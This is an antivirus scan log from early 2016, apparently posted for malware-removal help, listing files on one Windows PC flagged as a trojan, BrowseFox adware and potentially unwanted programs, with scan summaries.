4/23/2016	8:44:39 PM	"C:\ProgramData\83adbc82-10a7-0\BIT7C4C.tmp"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/23/2016	8:44:47 PM	"C:\ProgramData\83adbc82-1851-1\BIT7C3C.tmp"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/23/2016	8:45:22 PM	"C:\ProgramData\83adbc82-10a7-0\83adbc82-10a7-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/24/2016	1:52:05 PM	"C:\ProgramData\7607d362-3197-1\7607d362-3197-1.d"	"Generic PUP.x"	"3"

4/24/2016	1:52:05 PM	"C:\ProgramData\7607d362-50f3-0\7607d362-50f3-0.d"	"Generic PUP.x"	"3"

4/24/2016	1:52:05 PM	"C:\ProgramData\7607d362-3197-1\7607d362-3197-1.d"	"Generic PUP.x"	"3"

4/24/2016	1:52:05 PM	"C:\ProgramData\7607d362-50f3-0\7607d362-50f3-0.d"	"Generic PUP.x"	"3"

4/24/2016	2:41:04 PM	"C:\ProgramData\83adbc82-36c7-1\83adbc82-36c7-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/24/2016	2:41:04 PM	"C:\ProgramData\83adbc82-6d33-0\83adbc82-6d33-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/24/2016	2:42:04 PM	"C:\ProgramData\83adbc82-6d33-0\83adbc82-6d33-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/24/2016	2:42:05 PM	"C:\ProgramData\83adbc82-36c7-1\83adbc82-36c7-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/24/2016	7:52:04 PM	"C:\ProgramData\7607d362-1a81-0\7607d362-1a81-0.d"	"Generic PUP.x"	"3"

4/24/2016	7:52:04 PM	"C:\ProgramData\7607d362-1a81-0\7607d362-1a81-0.d"	"Generic PUP.x"	"3"

4/24/2016	7:52:05 PM	"C:\ProgramData\7607d362-2543-1\7607d362-2543-1.d"	"Generic PUP.x"	"3"

4/24/2016	7:52:05 PM	"C:\ProgramData\7607d362-2543-1\7607d362-2543-1.d"	"Generic PUP.x"	"3"

4/24/2016	8:41:03 PM	"C:\ProgramData\83adbc82-4c71-0\83adbc82-4c71-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/24/2016	8:41:04 PM	"C:\ProgramData\83adbc82-1c77-1\83adbc82-1c77-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/24/2016	8:42:05 PM	"C:\ProgramData\83adbc82-4c71-0\83adbc82-4c71-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/24/2016	8:42:05 PM	"C:\ProgramData\83adbc82-1c77-1\83adbc82-1c77-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/25/2016	8:19:14 PM	"C:\ProgramData\7607d362-27f3-1\7607d362-27f3-1.d"	"Generic PUP.x"	"3"

4/25/2016	8:19:14 PM	"C:\ProgramData\7607d362-7e15-0\7607d362-7e15-0.d"	"Generic PUP.x"	"3"

4/25/2016	8:19:14 PM	"C:\ProgramData\7607d362-27f3-1\7607d362-27f3-1.d"	"Generic PUP.x"	"3"

4/25/2016	8:19:14 PM	"C:\ProgramData\7607d362-7e15-0\7607d362-7e15-0.d"	"Generic PUP.x"	"3"

4/26/2016	2:21:18 PM	"C:\Users\Maximilian\AppData\Local\Temp\{0077ac26}"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/26/2016	2:21:21 PM	"C:\Users\Maximilian\AppData\Local\Temp\{003ddb5a}"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/26/2016	2:41:08 PM	"C:\ProgramData\83adbc82-52b3-1\83adbc82-52b3-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/26/2016	2:41:09 PM	"C:\ProgramData\83adbc82-3ad3-0\83adbc82-3ad3-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/26/2016	2:41:21 PM	"C:\ProgramData\83adbc82-52b3-1\BIT9678.tmp"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/26/2016	2:41:28 PM	"C:\ProgramData\83adbc82-3ad3-0\BIT9689.tmp"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/26/2016	2:42:08 PM	"C:\ProgramData\83adbc82-3ad3-0\83adbc82-3ad3-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/26/2016	2:42:11 PM	"C:\ProgramData\83adbc82-52b3-1\83adbc82-52b3-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/26/2016	5:01:44 PM	"C:\ProgramData\83adbc82-1c77-1\83adbc82-1c77-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/26/2016	5:01:51 PM	"C:\ProgramData\83adbc82-4c71-0\83adbc82-4c71-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"
         

SYSTEM_ODS.LOG:

Code:
ATTFilter
1/2/2016	3:19:23 PM	Scan Started: 01/02/2016 03:19:23 PM

1/8/2016	1:40:41 PM	Scan Started: 01/08/2016 01:40:41 PM

1/8/2016	9:06:24 PM	"C:\ProgramData\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\40.0.0.dll"	"BrowseFox-FAD"	"3"

1/8/2016	9:07:44 PM	"C:\Users\All Users\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\40.0.0.dll"	"BrowseFox-FAD"	"3"

1/8/2016	9:27:52 PM	"C:\Windows.old\Users\All Users\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\40.0.0.dll"	"BrowseFox-FAD"	"3"

1/15/2016	10:12:10 PM	Scan Started: 01/15/2016 10:12:10 PM

1/15/2016	10:23:10 PM	"C:\Program Files (x86)\Common Files\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\updater.upd"	"BrowseFox.p"	"3"

1/15/2016	10:30:20 PM	"C:\ProgramData\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugincontainer.upd"	"BrowseFox.p"	"3"

1/15/2016	10:30:20 PM	"C:\ProgramData\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\12\resources\plugin.dll"	"BrowseFox.q"	"3"

1/15/2016	10:30:27 PM	"C:\ProgramData\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\40.0.0.dll"	"BrowseFox-FAD"	"3"

1/15/2016	10:30:28 PM	"C:\ProgramData\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\45.0.1.dll"	"BrowseFox-FAD"	"3"

1/15/2016	10:33:31 PM	"C:\Users\All Users\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugincontainer.upd"	"BrowseFox.p"	"3"

1/15/2016	10:33:31 PM	"C:\Users\All Users\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\45.0.1.dll"	"BrowseFox-FAD"	"3"

1/15/2016	10:33:31 PM	"C:\Users\All Users\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\12\resources\plugin.dll"	"BrowseFox.q"	"3"

1/15/2016	10:33:31 PM	"C:\Users\All Users\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\40.0.0.dll"	"BrowseFox-FAD"	"3"

1/15/2016	10:38:00 PM	"C:\Users\Maximilian\AppData\Local\Temp\{0268E7C1-CF93-4382-8DC9-5EE89A872135}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:00 PM	"C:\Users\Maximilian\AppData\Local\Temp\{0A37D5BB-B2F2-448F-94E4-A38C7B782D88}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:00 PM	"C:\Users\Maximilian\AppData\Local\Temp\{0AA306C2-2087-447A-9E8E-12D8698CDAE7}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:00 PM	"C:\Users\Maximilian\AppData\Local\Temp\{161E2EFA-4CE5-4604-82CA-A92C09006261}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:00 PM	"C:\Users\Maximilian\AppData\Local\Temp\{19193F1F-0891-4F37-B54A-456C922B435B}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:00 PM	"C:\Users\Maximilian\AppData\Local\Temp\{241226D8-81E2-49A2-8A32-9A2480DF85E0}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:00 PM	"C:\Users\Maximilian\AppData\Local\Temp\{39CD2D09-96CF-4A30-8014-B686B1DCAF9B}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:00 PM	"C:\Users\Maximilian\AppData\Local\Temp\{3A991E03-D5AD-4C90-A137-AA63A518A831}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:00 PM	"C:\Users\Maximilian\AppData\Local\Temp\{4C21733B-D6C9-4D26-9276-B8275CC24BB6}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:00 PM	"C:\Users\Maximilian\AppData\Local\Temp\{53925C0F-06EB-454A-A18E-E3A03ABC592D}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:00 PM	"C:\Users\Maximilian\AppData\Local\Temp\{56AB1F39-FFE1-4CEC-B2D3-85F4E295958F}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:00 PM	"C:\Users\Maximilian\AppData\Local\Temp\{65D35E2D-61E7-47D5-BDB8-0F488C0D77F0}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:00 PM	"C:\Users\Maximilian\AppData\Local\Temp\{77A8CFD0-DE1B-4874-A6C2-42F9BAD36353}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:00 PM	"C:\Users\Maximilian\AppData\Local\Temp\{7A04F5B8-25B2-4B1C-B2A4-B6469AB1D5C8}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:01 PM	"C:\Users\Maximilian\AppData\Local\Temp\{82C5EE06-7F14-4270-97F2-2CB78A9B3AD6}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:01 PM	"C:\Users\Maximilian\AppData\Local\Temp\{997BEA41-0448-4A2E-B6D6-09C9A8B59F88}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:01 PM	"C:\Users\Maximilian\AppData\Local\Temp\{9C95D521-D8D2-475C-BCC5-22E3BF6317C2}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:01 PM	"C:\Users\Maximilian\AppData\Local\Temp\{A3FE12EB-BE9A-4406-AFBA-2F266322B073}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:01 PM	"C:\Users\Maximilian\AppData\Local\Temp\{A763DC23-488C-470E-808E-22986DEE9C7C}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:01 PM	"C:\Users\Maximilian\AppData\Local\Temp\{A8AC4013-6B95-4F0F-8EA0-CBB290D67DD1}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:02 PM	"C:\Users\Maximilian\AppData\Local\Temp\{00D8B382-FBF5-4579-ABAB-A24ACA0FD50C}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:02 PM	"C:\Users\Maximilian\AppData\Local\Temp\{D4C200CF-C7BC-4C3C-BA5B-5EB1B803B212}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:02 PM	"C:\Users\Maximilian\AppData\Local\Temp\{CDD42E42-FB87-4ACE-807B-7EAEC3B00A64}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:02 PM	"C:\Users\Maximilian\AppData\Local\Temp\{C2C6E6ED-8E21-4F8F-BE43-E982D48D491D}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:02 PM	"C:\Users\Maximilian\AppData\Local\Temp\{E16E3AC9-919A-444B-8174-329E93BA295A}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:02 PM	"C:\Users\Maximilian\AppData\Local\Temp\{E7B2CA9A-BBE6-4489-9B0C-38045A787FD2}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:02 PM	"C:\Users\Maximilian\AppData\Local\Temp\{EB423FE6-143F-4830-9520-579B4A753BBB}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:02 PM	"C:\Users\Maximilian\AppData\Local\Temp\{F14A8ADF-4232-4A16-9CB8-8700A366D4ED}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:03 PM	"C:\Users\Maximilian\AppData\Local\Temp\{F674CFC5-E64F-4F58-B27F-A5A0893A33B6}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:03 PM	"C:\Users\Maximilian\AppData\Local\Temp\{F7FFBF24-C1EC-4B1C-AF87-1313FC20B43A}.dll"	"BrowseFox.q"	"3"

1/15/2016	10:38:03 PM	"C:\Users\Maximilian\AppData\Local\Temp\{FD7C2464-A81A-4821-9EB7-CD2B53EE4F8A}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:48:06 PM	Scan Started: 01/21/2016 08:48:06 PM

1/21/2016	8:57:17 PM	"C:\Program Files (x86)\Common Files\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\updater.upd"	"BrowseFox.p"	"3"

1/21/2016	9:01:58 PM	"C:\ProgramData\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugincontainer.upd"	"BrowseFox.p"	"3"

1/21/2016	9:01:58 PM	"C:\ProgramData\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\12\resources\plugin.dll"	"BrowseFox.q"	"3"

1/21/2016	9:01:58 PM	"C:\ProgramData\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\40.0.0.dll"	"BrowseFox-FAD"	"3"

1/21/2016	9:02:00 PM	"C:\ProgramData\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\45.0.1.dll"	"BrowseFox-FAD"	"3"

1/21/2016	9:03:22 PM	"C:\Users\All Users\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\12\resources\plugin.dll"	"BrowseFox.q"	"3"

1/21/2016	9:03:22 PM	"C:\Users\All Users\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\45.0.1.dll"	"BrowseFox-FAD"	"3"

1/21/2016	9:03:23 PM	"C:\Users\All Users\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\40.0.0.dll"	"BrowseFox-FAD"	"3"

1/21/2016	9:03:23 PM	"C:\Users\All Users\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugincontainer.upd"	"BrowseFox.p"	"3"

1/21/2016	9:06:47 PM	"C:\Users\Maximilian\AppData\Local\Temp\{00D8B382-FBF5-4579-ABAB-A24ACA0FD50C}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:47 PM	"C:\Users\Maximilian\AppData\Local\Temp\{161E2EFA-4CE5-4604-82CA-A92C09006261}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:47 PM	"C:\Users\Maximilian\AppData\Local\Temp\{0A37D5BB-B2F2-448F-94E4-A38C7B782D88}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:47 PM	"C:\Users\Maximilian\AppData\Local\Temp\{0AA306C2-2087-447A-9E8E-12D8698CDAE7}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:47 PM	"C:\Users\Maximilian\AppData\Local\Temp\{19193F1F-0891-4F37-B54A-456C922B435B}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:48 PM	"C:\Users\Maximilian\AppData\Local\Temp\{241226D8-81E2-49A2-8A32-9A2480DF85E0}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:48 PM	"C:\Users\Maximilian\AppData\Local\Temp\{39CD2D09-96CF-4A30-8014-B686B1DCAF9B}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:48 PM	"C:\Users\Maximilian\AppData\Local\Temp\{3A991E03-D5AD-4C90-A137-AA63A518A831}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:48 PM	"C:\Users\Maximilian\AppData\Local\Temp\{4C21733B-D6C9-4D26-9276-B8275CC24BB6}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:48 PM	"C:\Users\Maximilian\AppData\Local\Temp\{53925C0F-06EB-454A-A18E-E3A03ABC592D}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:48 PM	"C:\Users\Maximilian\AppData\Local\Temp\{56AB1F39-FFE1-4CEC-B2D3-85F4E295958F}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:48 PM	"C:\Users\Maximilian\AppData\Local\Temp\{65D35E2D-61E7-47D5-BDB8-0F488C0D77F0}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:48 PM	"C:\Users\Maximilian\AppData\Local\Temp\{77A8CFD0-DE1B-4874-A6C2-42F9BAD36353}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:48 PM	"C:\Users\Maximilian\AppData\Local\Temp\{7A04F5B8-25B2-4B1C-B2A4-B6469AB1D5C8}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:48 PM	"C:\Users\Maximilian\AppData\Local\Temp\{82C5EE06-7F14-4270-97F2-2CB78A9B3AD6}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:49 PM	"C:\Users\Maximilian\AppData\Local\Temp\{997BEA41-0448-4A2E-B6D6-09C9A8B59F88}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:49 PM	"C:\Users\Maximilian\AppData\Local\Temp\{9C95D521-D8D2-475C-BCC5-22E3BF6317C2}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:49 PM	"C:\Users\Maximilian\AppData\Local\Temp\{A3FE12EB-BE9A-4406-AFBA-2F266322B073}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:49 PM	"C:\Users\Maximilian\AppData\Local\Temp\{A763DC23-488C-470E-808E-22986DEE9C7C}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:49 PM	"C:\Users\Maximilian\AppData\Local\Temp\{A8AC4013-6B95-4F0F-8EA0-CBB290D67DD1}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:49 PM	"C:\Users\Maximilian\AppData\Local\Temp\{C2C6E6ED-8E21-4F8F-BE43-E982D48D491D}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:49 PM	"C:\Users\Maximilian\AppData\Local\Temp\{CDD42E42-FB87-4ACE-807B-7EAEC3B00A64}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:49 PM	"C:\Users\Maximilian\AppData\Local\Temp\{D4C200CF-C7BC-4C3C-BA5B-5EB1B803B212}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:49 PM	"C:\Users\Maximilian\AppData\Local\Temp\{E16E3AC9-919A-444B-8174-329E93BA295A}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:49 PM	"C:\Users\Maximilian\AppData\Local\Temp\{E7B2CA9A-BBE6-4489-9B0C-38045A787FD2}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:49 PM	"C:\Users\Maximilian\AppData\Local\Temp\{EB423FE6-143F-4830-9520-579B4A753BBB}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:50 PM	"C:\Users\Maximilian\AppData\Local\Temp\{F14A8ADF-4232-4A16-9CB8-8700A366D4ED}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:50 PM	"C:\Users\Maximilian\AppData\Local\Temp\{F674CFC5-E64F-4F58-B27F-A5A0893A33B6}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:50 PM	"C:\Users\Maximilian\AppData\Local\Temp\{FD7C2464-A81A-4821-9EB7-CD2B53EE4F8A}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:50 PM	"C:\Users\Maximilian\AppData\Local\Temp\{0268E7C1-CF93-4382-8DC9-5EE89A872135}.dll"	"BrowseFox.q"	"3"

1/21/2016	9:06:50 PM	"C:\Users\Maximilian\AppData\Local\Temp\{F7FFBF24-C1EC-4B1C-AF87-1313FC20B43A}.dll"	"BrowseFox.q"	"3"

1/22/2016	10:33:54 PM	"C:\Windows.old\Users\All Users\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\45.0.1.dll"	"BrowseFox-FAD"	"3"

1/22/2016	10:33:54 PM	"C:\Windows.old\Users\All Users\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugincontainer.upd"	"BrowseFox.p"	"3"

1/22/2016	10:33:54 PM	"C:\Windows.old\Users\All Users\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\12\resources\plugin.dll"	"BrowseFox.q"	"3"

1/22/2016	10:33:54 PM	"C:\Windows.old\Users\All Users\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\40.0.0.dll"	"BrowseFox-FAD"	"3"

1/22/2016	10:34:57 PM	"C:\Windows.old\Users\Maximilian\AppData\Local\Temp\{02A112B7-0921-49B7-98C7-7D633E05707C}.dll"	"BrowseFox.q"	"3"

1/22/2016	10:34:58 PM	"C:\Windows.old\Users\Maximilian\AppData\Local\Temp\{0DCBB9F5-C7A6-4985-A412-6C9EE0F85253}.dll"	"BrowseFox.q"	"3"

1/22/2016	10:34:58 PM	"C:\Windows.old\Users\Maximilian\AppData\Local\Temp\{2E9A6A6E-7DDE-411E-8829-9FA0F3365B8C}.dll"	"BrowseFox.q"	"3"

1/22/2016	10:35:01 PM	"C:\Windows.old\Users\Maximilian\AppData\Local\Temp\{56D07CAF-4EA3-401B-A3D9-E7CF8FDE5B31}.dll"	"BrowseFox.q"	"3"

1/22/2016	10:35:01 PM	"C:\Windows.old\Users\Maximilian\AppData\Local\Temp\{57801F90-A381-4BBD-9A56-F2EC7021B8B9}.dll"	"BrowseFox.q"	"3"

1/22/2016	10:35:02 PM	"C:\Windows.old\Users\Maximilian\AppData\Local\Temp\{5C2BDAFA-E4DD-421A-A903-8D88ED1FD96C}.dll"	"BrowseFox.q"	"3"

1/22/2016	10:35:02 PM	"C:\Windows.old\Users\Maximilian\AppData\Local\Temp\{9BBA8AC8-6E6B-4025-AE46-920E0E1775A0}.dll"	"BrowseFox.q"	"3"

1/22/2016	10:35:02 PM	"C:\Windows.old\Users\Maximilian\AppData\Local\Temp\{A8869C27-B08E-4F60-BA48-FAFB6ECD3205}.dll"	"BrowseFox.q"	"3"

1/22/2016	10:35:02 PM	"C:\Windows.old\Users\Maximilian\AppData\Local\Temp\{ABADED79-A655-498F-8D5C-F13863B29878}.dll"	"BrowseFox.q"	"3"

1/22/2016	10:35:02 PM	"C:\Windows.old\Users\Maximilian\AppData\Local\Temp\{C5A47EC0-5D8B-4991-9964-FFCD69A4B886}.dll"	"BrowseFox.q"	"3"

1/22/2016	10:35:02 PM	"C:\Windows.old\Users\Maximilian\AppData\Local\Temp\{3DCBC7EF-74CD-414B-9314-E9EF00320A3A}.dll"	"BrowseFox.q"	"3"

1/22/2016	10:35:02 PM	"C:\Windows.old\Users\Maximilian\AppData\Local\Temp\{C5CE679F-4F37-4AD1-A73E-CDC144B701D0}.dll"	"BrowseFox.q"	"3"

1/22/2016	10:35:02 PM	"C:\Windows.old\Users\Maximilian\AppData\Local\Temp\{CD2A89E0-E811-4DBD-958A-F3DCED7301EF}.dll"	"BrowseFox.q"	"3"

1/22/2016	10:35:02 PM	"C:\Windows.old\Users\Maximilian\AppData\Local\Temp\{F28D8A28-5595-4D3A-BEF7-7A504864E93D}.dll"	"BrowseFox.q"	"3"

1/22/2016	10:35:02 PM	"C:\Windows.old\Users\Maximilian\AppData\Local\Temp\{EE5B33D6-D3CE-4F9B-AAA3-EB4392D57FB6}.dll"	"BrowseFox.q"	"3"

1/22/2016	10:35:03 PM	"C:\Windows.old\Users\Maximilian\AppData\Local\Temp\{F852C65A-56E1-4D02-9E53-44DF90214BAA}.dll"	"BrowseFox.q"	"3"

1/23/2016	12:17:12 PM	Total objects scanned: 392631

1/23/2016	12:17:12 PM	Objects detected: 60

1/23/2016	12:17:12 PM	Scan Done: 01/23/2016 12:17:12 PM

1/29/2016	5:56:57 PM	Scan Started: 01/29/2016 05:56:57 PM

1/29/2016	6:11:39 PM	Total objects scanned: 83762

1/29/2016	6:11:39 PM	Objects detected: 0

1/29/2016	6:11:39 PM	Scan Done: 01/29/2016 06:11:39 PM

2/4/2016	5:41:00 PM	Scan Started: 02/04/2016 05:41:00 PM

2/4/2016	5:53:01 PM	"C:\Users\Maximilian\AppData\Local\Temp\2051208.tmp"	"Artemis!121B3B521E1F"	"3"

2/4/2016	6:30:19 PM	Total objects scanned: 295804

2/4/2016	6:30:19 PM	Objects detected: 1

2/4/2016	6:30:19 PM	Scan Done: 02/04/2016 06:30:19 PM

2/5/2016	9:24:01 PM	Scan Started: 02/05/2016 09:24:01 PM

2/6/2016	4:02:26 PM	Total objects scanned: 296881

2/6/2016	4:02:26 PM	Objects detected: 0

2/6/2016	4:02:26 PM	Scan Done: 02/06/2016 04:02:26 PM

2/12/2016	2:06:30 PM	Scan Started: 02/12/2016 02:06:30 PM

2/13/2016	7:01:58 PM	Total objects scanned: 321757

2/13/2016	7:01:58 PM	Objects detected: 0

2/13/2016	7:01:58 PM	Scan Done: 02/13/2016 07:01:58 PM

2/19/2016	2:40:05 PM	Scan Started: 02/19/2016 02:40:05 PM

2/20/2016	7:14:13 PM	Total objects scanned: 346804

2/20/2016	7:14:13 PM	Objects detected: 0

2/20/2016	7:14:13 PM	Scan Done: 02/20/2016 07:14:13 PM

2/27/2016	11:36:04 AM	Scan Started: 02/27/2016 11:36:04 AM

2/28/2016	11:31:20 AM	Total objects scanned: 339070

2/28/2016	11:31:20 AM	Objects detected: 0

2/28/2016	11:31:20 AM	Scan Done: 02/28/2016 11:31:20 AM

3/3/2016	7:47:16 PM	Scan Started: 03/03/2016 07:47:16 PM

3/5/2016	4:28:11 PM	Scan Started: 03/05/2016 04:28:11 PM

3/5/2016	5:37:20 PM	Total objects scanned: 353167

3/5/2016	5:37:20 PM	Objects detected: 0

3/5/2016	5:37:20 PM	Scan Done: 03/05/2016 05:37:20 PM

3/12/2016	11:56:40 AM	Scan Started: 03/12/2016 11:56:40 AM

3/18/2016	9:22:48 PM	Scan Started: 03/18/2016 09:22:48 PM

3/19/2016	11:49:14 AM	"C:\Users\Maximilian\AppData\Local\Temp\F80DD74ECDA530855AA86E4D608AC88A.exe"	"Artemis!617B0895144C"	"3"

3/19/2016	11:49:30 AM	"C:\Users\Maximilian\AppData\Local\Temp\{001000ed}"	"Artemis!3D570732C5E2"	"3"

3/19/2016	11:49:30 AM	"C:\Users\Maximilian\AppData\Local\Temp\{004b898d}"	"Artemis!617B0895144C"	"3"

3/19/2016	12:16:51 PM	"C:\Windows\System32\MRT\3AC662F4-BBD5-4771-B2A0-164912094D5D\FilesStash\B46D29A6-7B77-51A7-4237-9E009413AAA0"	"Artemis!614B59AA1516"	"2"

3/19/2016	12:33:19 PM	Total objects scanned: 376615

3/19/2016	12:33:19 PM	Objects detected: 4

3/19/2016	12:33:19 PM	Scan Done: 03/19/2016 12:33:19 PM

3/25/2016	6:49:43 PM	Scan Started: 03/25/2016 06:49:43 PM

3/25/2016	7:09:50 PM	"C:\Users\Maximilian\AppData\Local\Temp\F80DD74ECDA530855AA86E4D608AC88A.exe"	"Artemis!617B0895144C"	"3"

3/26/2016	1:09:12 PM	Total objects scanned: 392446

3/26/2016	1:09:12 PM	Objects detected: 1

3/26/2016	1:09:12 PM	Scan Done: 03/26/2016 01:09:12 PM

4/1/2016	7:08:11 PM	Scan Started: 04/01/2016 07:08:11 PM

4/1/2016	7:35:26 PM	"C:\$Recycle.Bin\S-1-5-21-1076315954-907306345-2410837627-1001\$RB4PYMI"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/1/2016	7:35:34 PM	"C:\$Recycle.Bin\S-1-5-21-1076315954-907306345-2410837627-1001\$RGRKWTU"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/1/2016	7:35:35 PM	"C:\$Recycle.Bin\S-1-5-21-1076315954-907306345-2410837627-1001\$RI2ZP1I"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/1/2016	7:35:49 PM	"C:\$Recycle.Bin\S-1-5-21-1076315954-907306345-2410837627-1001\$RYK9X4W"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/1/2016	9:21:00 PM	"C:\Users\Maximilian\AppData\Local\Temp\{000d6c77}"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/1/2016	9:21:00 PM	"C:\Users\Maximilian\AppData\Local\Temp\{002558f7}"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/1/2016	9:21:00 PM	"C:\Users\Maximilian\AppData\Local\Temp\{00239b38}"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/1/2016	9:21:00 PM	"C:\Users\Maximilian\AppData\Local\Temp\{001ca4f1}"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/1/2016	9:21:09 PM	"C:\Users\Maximilian\AppData\Local\Temp\{0031a921}"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/1/2016	9:21:09 PM	"C:\Users\Maximilian\AppData\Local\Temp\{002c8cf2}"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/1/2016	9:21:10 PM	"C:\Users\Maximilian\AppData\Local\Temp\{0052bed0}"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/1/2016	9:21:10 PM	"C:\Users\Maximilian\AppData\Local\Temp\{00759dd3}"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/1/2016	9:56:32 PM	Total objects scanned: 402479

4/1/2016	9:56:32 PM	Objects detected: 12

4/1/2016	9:56:32 PM	Scan Done: 04/01/2016 09:56:32 PM

4/2/2016	8:47:27 PM	Scan Started: 04/02/2016 08:47:27 PM

4/2/2016	9:02:37 PM	Total objects scanned: 11384

4/2/2016	9:02:37 PM	Objects detected: 0

